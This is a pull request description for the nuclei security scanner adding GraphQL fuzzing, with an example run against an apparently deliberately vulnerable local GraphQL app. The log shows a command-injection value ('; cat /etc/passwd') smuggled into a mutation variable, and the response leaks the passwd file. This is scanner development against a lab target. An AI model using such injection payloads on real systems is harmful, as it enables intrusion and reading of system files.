nuclei
nuclei copied to clipboard
projectdiscovery
feat: added initial graphql fuzzing support
Proposed changes
- [ ] Get param graphql fuzzing support
- [x] Improve validation for graphql detection
- [ ] Introspection linking (file, url, automatic)
- [x] Test cases
Checklist
- [ ] Pull request is created against the dev branch
- [ ] All checks passed (lint, unit/integration/regression tests etc.) with my changes
- [ ] I have added tests that prove my fix is effective or that my feature works
- [ ] I have added necessary documentation (if appropriate)
Example run:
[INF] [cmdi-blind-oast-polyglot] Fuzz points for http://localhost:5013/graphql [POST]
{
"body": {
"host": "example.com",
"path": "/robots.txt",
"port": "80",
"scheme": "http"
}
}
[INF] [cmdi-blind-oast-polyglot] Dumped HTTP request for http://localhost:5013/graphql
POST /graphql HTTP/1.1
Host: localhost:5013
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
Content-Length: 291
Accept: application/json
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.5
Connection: keep-alive
Content-Type: application/json
Cookie: env=graphiql:disable
Origin: http://localhost:5013
Priority: u=0
Referer: http://localhost:5013/import_paste
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
{"query":"mutation ImportPaste($host: String!, $port: Int!, $path: String!, $scheme: String!) {\n importPaste(host: $host, port: $port, path: $path, scheme: $scheme) {\n result\n }\n}\n","variables":{"scheme":"http","host":"example.com","port":80,"path":"/robots.txt; cat /etc/passwd"}}
[VER] [cmdi-blind-oast-polyglot] Sent HTTP request to http://localhost:5013/graphql
[DBG] [cmdi-blind-oast-polyglot] Dumped HTTP response http://localhost:5013/graphql
HTTP/1.1 200 OK
Content-Length: 2130
Content-Type: application/json
Date: Thu, 10 Oct 2024 10:00:11 GMT
{"data":{"importPaste":{"result":"<!doctype html>\n<html>\n<head>\n <title>Example Domain</title>\n\n <meta charset=\"utf-8\" />\n <meta http-equiv=\"Content-type\" content=\"text/html; charset=utf-8\" />\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\" />\n <style type=\"text/css\">\n body {\n background-color: #f0f0f2;\n margin: 0;\n padding: 0;\n font-family: -apple-system, system-ui, BlinkMacSystemFont, \"Segoe UI\", \"Open Sans\", \"Helvetica Neue\", Helvetica, Arial, sans-serif;\n \n }\n div {\n width: 600px;\n margin: 5em auto;\n padding: 2em;\n background-color: #fdfdff;\n border-radius: 0.5em;\n box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02);\n }\n a:link, a:visited {\n color: #38488f;\n text-decoration: none;\n }\n @media (max-width: 700px) {\n div {\n margin: 0 auto;\n width: auto;\n }\n }\n </style> \n</head>\n\n<body>\n<div>\n <h1>Example Domain</h1>\n <p>This domain is for use in illustrative examples in documents. You may use this\n domain in literature without prior coordination or asking for permission.</p>\n <p><a href=\"https://www.iana.org/domains/example\">More information...</a></p>\n</div>\n</body>\n</html>\nroot:x:0:0:root:/root:/bin/sh\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/mail:/sbin/nologin\nnews:x:9:13:news:/usr/lib/news:/sbin/nologin\nuucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin\ncron:x:16:16:cron:/var/spool/cron:/sbin/nologin\nftp:x:21:21::/var/lib/ftp:/sbin/nologin\nsshd:x:22:22:sshd:/dev/null:/sbin/nologin\ngames:x:35:35:games:/usr/games:/sbin/nologin\nntp:x:123:123:NTP:/var/empty:/sbin/nologin\nguest:x:405:100:guest:/dev/null:/sbin/nologin\nnobody:x:65534:65534:nobody:/:/sbin/nologin\ndvga:x:1000:1000:Linux User,,,:/home/dvga:/bin/sh\n"}}}
[cmdi-blind-oast-polyglot:regex-1] [http] [high] http://localhost:5013/graphql [body:path] [POST]
